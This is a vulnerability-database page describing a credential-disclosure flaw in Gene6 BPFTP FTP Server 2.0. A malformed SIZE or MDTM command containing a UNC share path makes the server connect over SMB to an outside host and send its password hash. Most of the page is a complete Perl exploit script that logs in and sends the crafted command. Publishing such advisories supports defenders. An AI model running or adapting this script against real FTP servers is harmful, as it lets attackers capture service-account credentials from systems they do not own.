Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Gene6 BPFTP FTP Server 2.0 User Credentials Disclosure Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 32 Views

Gene6 BPFTP FTP Server 2.0 User Credentials Disclosure Vulnerability. Malformed commands allow exploitation to force external SMB connection resulting in password hash capture

Code

                                                source: http://www.securityfocus.com/bid/2534/info

G6 FTP Server now known as BPFTP Server is an internet FTP server by Gene6

If a logged in FTP user connects to an external share and submits a malformed 'size' or 'mdtm' command, the user could force the FTP server to make an external SMB connection.

The FTP server must provide login credentials of the user the server is running under in order to make a connection to the remote host. A password hash is sent across the external connection to the host. A third party network utility could be listening for internal and external traffic and capture the password hash. The captured hash could be resolved into the username and password.

#!/usr/bin/perl
# G6-2nbt.pl - example G6 ftp server netbios connection script
#
# Tested on win32 and Linux, Linux requires share name to be in
# the format: \\\\host\\share\\path or //host/share/path

use Getopt::Std;
use IO::Socket;

my($host,$login,$pass,$share,$CRLF,$result);

$CRLF = "\015\012";
getopts('h:l:p:s:',\%args);

if (!defined $args{h}){ print "No host specified.\n";exit;}else{$host =
$args{h};}
if (!defined $args{s}){ print "No share specified.\n";exit;}else{$share =
$args{s};}
if (!defined $args{l} || !defined $args{p}){($login,$pass) =
('anonymous','[email protected]');}
else { ($login,$pass) = ($args{l},$args{p});}

$our_sock =
IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host,PeerPort=>21)||
die("Socket problems.");

print "Connected!\n";
print "Login...";

print $our_sock "USER $login" . $CRLF;
$result = <$our_sock>;
if ($result !~ /331\s/) { print "User name not accepted or an error
occurred...exiting.\n";close($our_sock);exit; }

print "good.\nPass....";

print $our_sock "PASS $pass" . $CRLF;
$result = <$our_sock>;
if ($result !~ /230\s/) { if ($result =~ /530\s/) { print "Login/password
incorrect exiting.\n";close($our_sock);exit; } else { print "Login
failure..exiting.\n";close($our_sock);exit; }}

print "good.\nTesting path type...";

print $our_sock "PWD" . $CRLF;
$result = <$our_sock>;
$result = <$our_sock>;
if (lc($result) !~ /\/[a-z][:]\//) { print "Looks like 'show relative
path' is enabled...exiting.\n";close($our_sock);exit;}

print "not relative path.\nSending UNC to connect to...";

print $our_sock "SIZE $share" . $CRLF;
print "completed.\nCheck your logs.\n";

close($our_sock);
exit;

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
gene6 bpftp serveruser credentialsdisclosurevulnerabilityftp servermalformed commandssmb connectionpassword hashcaptureexploit
32